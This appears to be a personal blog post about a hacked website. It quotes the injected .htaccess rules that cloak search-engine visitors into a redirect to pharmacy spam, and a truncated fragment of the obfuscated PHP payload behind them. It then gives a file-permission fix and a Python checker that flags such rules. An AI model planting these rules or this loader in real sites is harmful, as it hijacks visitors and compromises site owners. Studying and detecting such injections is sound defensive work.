[SOLVED][HACKED] .htaccess

Hacking is always painful for programmers and website owners. One of my websites, greatindiantaste.com, got hacked, and all my visitors who came from any search engine like Google, MSN, Bing etc. were being redirected to some medicine websites. As I was busy, I was not monitoring it.

I don't know for how many days or months it had been happening. One day I was searching for something and found my site title in the Google search results, but the content of the results was horrible. When I clicked the link, it redirected me to some medicine sites selling Viagra and other such medicines.

So I debugged my hosting and found the code below written in my .htaccess:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (msn|bing|yahoo|aol|google) [OR]
RewriteCond %{HTTP_REFERER} (msn|bing|yahoo|aol|google)
RewriteCond %{HTTP_HOST} greatindiantaste\.com$
RewriteRule . quotes2-quotes.php?$1 [L]
# Deny access to all .htaccess files

So what is this code, and what does it do to my website?

The code redirects all users from my site to the hacker's site using the quotes2-quotes.php file, which had also been created in my hosting.

When a user first lands on the site, the server always reads the .htaccess for rewrite rules, and it finds that every user referred from one of the listed search engines should go to quotes2-quotes.php. This PHP file has so much code that you cannot understand it if you do not have deep knowledge. Below is a little of the code from the file:

goto O8876; O8037: $vZ0gG = 'Z1GbM0D='; goto O7826; O5771: $nsN0D = 'Drx9zL=='; goto O8393; O0986: $v0ASp = 'Nn=='; goto O8518; O2560: O8655: goto O1472; O6091: $O2638(); goto O4876; O6317: if (!(!$O8543 && !($O7567 = $Dcw1e($O0286)))) { goto O1745; } goto O7326; O0046: $a11by = 'jpxW3o3AJq=='; goto O8913; O4017: $J11TC = 'ZSHHESF='; goto O9474; O2201: if (!isset($O1246[$O4593])) { goto O1534; } goto O5374; O0827: O6439: goto O4934; O2634: $O9694 = $QIHRJ($O2553, $Pd1Th) === 0 ? $Hl0DD($O2553, 4) : $O2553; goto O5074; O4029: $ey1Tr = ''; goto O6337; O2746: $Pd1Th = 'tY3q3q=='; goto O9551; O9526: function CFhOS() { goto O4941; O9038: $O3049 = $vuSA0($ld0K0, $O4741[$P00V1]); goto O5462; O7811: $O3049 = $abwtP($s1rnX, $O3049); goto O3671; O4941: global $O4741, $P00V1, $vuSA0, $wD1a0, $ld0K0, $o1Ex1, $CRL01, $H1s1k, $s1rnX, $abwtP; goto O9038; O3671: return $CRL01(0, 1) ? $O3049 : $o1Ex1($O3049); goto O8963; O5462: unset($O3049[$wD1a0(0, $H1s1k($O3049) - 1)]); goto O7811; O8963: } goto O4943; O3604: $nw10p = 'NV=='; goto O3416; O8947: $kh1Xe = 'm9TplE3p'; goto O1114; O8553: $d0be0 = '2IzplE3p'; goto O4149; O6043: $a1U1A = 'HzrcAKMfyzM='; goto O6115; O1037: $O0509 = $a1pI1($D010V, $XZ1P0($O8655, 2)); goto O8413; O5991: function O6020($O2573) { goto O4382; O6540: return $v0C1r($O2573, $O5417, $d0be0($O5417)); goto O8205; O2607: $O5417 = $kKwW0 . $Ibl01($EYWmr, $A0oxZ($w0H1s($Mj0Yk, $D1000), $LwV11($SqX0F, $VBS0X))) . $Iu0ce; goto O6540; O4382: global $A0oxZ, $D1000, $v0C1r, $d0be0, $SqX0F, $Mj0Yk, $I

Solution:

I found that my .htaccess had write privileges for the owner, so what did I do? I made the file read-only for everyone, and to this day no such hacking has happened to my .htaccess or any other folder :).
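
A check for this kind of injected rule, as an added example that is not from the original post: it flags any RewriteRule whose preceding RewriteCond lines test the User-Agent or Referer against search-engine names. The function name, the engine list and the second rule block in the sample are assumptions made for the illustration.

```python
import re

# Request variables that cloaking rules key on, and engine names to look for
# (assumed list, taken from the pattern in the injected rules).
SUSPECT_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER")
ENGINES = re.compile(r"google|bing|msn|yahoo|aol", re.I)
DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(\S+)", re.I)


def find_cloaked_rewrites(htaccess_text):
    """Return (line_no, target, variables) for each RewriteRule whose
    preceding RewriteCond lines test the User-Agent or Referer against
    search-engine names."""
    findings, pending = [], []
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue  # comments, blank lines, other directives
        kind, first, second = m.group(1).lower(), m.group(2), m.group(3)
        if kind == "rewritecond":
            # first = test string such as %{HTTP_REFERER}, second = pattern
            for var in SUSPECT_VARS:
                if var in first.upper() and ENGINES.search(second):
                    pending.append(var)
        else:
            # RewriteCond lines apply only to the next RewriteRule.
            if pending:
                findings.append((line_no, second, sorted(set(pending))))
            pending = []
    return findings


# Constructed sample: the injected rules quoted in the post, followed by an
# ordinary front-controller block (hypothetical) that must not be flagged.
SAMPLE = r"""RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (msn|bing|yahoo|aol|google) [OR]
RewriteCond %{HTTP_REFERER} (msn|bing|yahoo|aol|google)
RewriteCond %{HTTP_HOST} greatindiantaste\.com$
RewriteRule . quotes2-quotes.php?$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

if __name__ == "__main__":
    for line_no, target, variables in find_cloaked_rewrites(SAMPLE):
        print(f"line {line_no}: rewrite to {target} gated on {', '.join(variables)}")
```

Because the rules only fire for search-engine crawlers and search referrals, a site owner who types the address directly never sees the redirect, so a file-level check like this catches what normal browsing does not.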
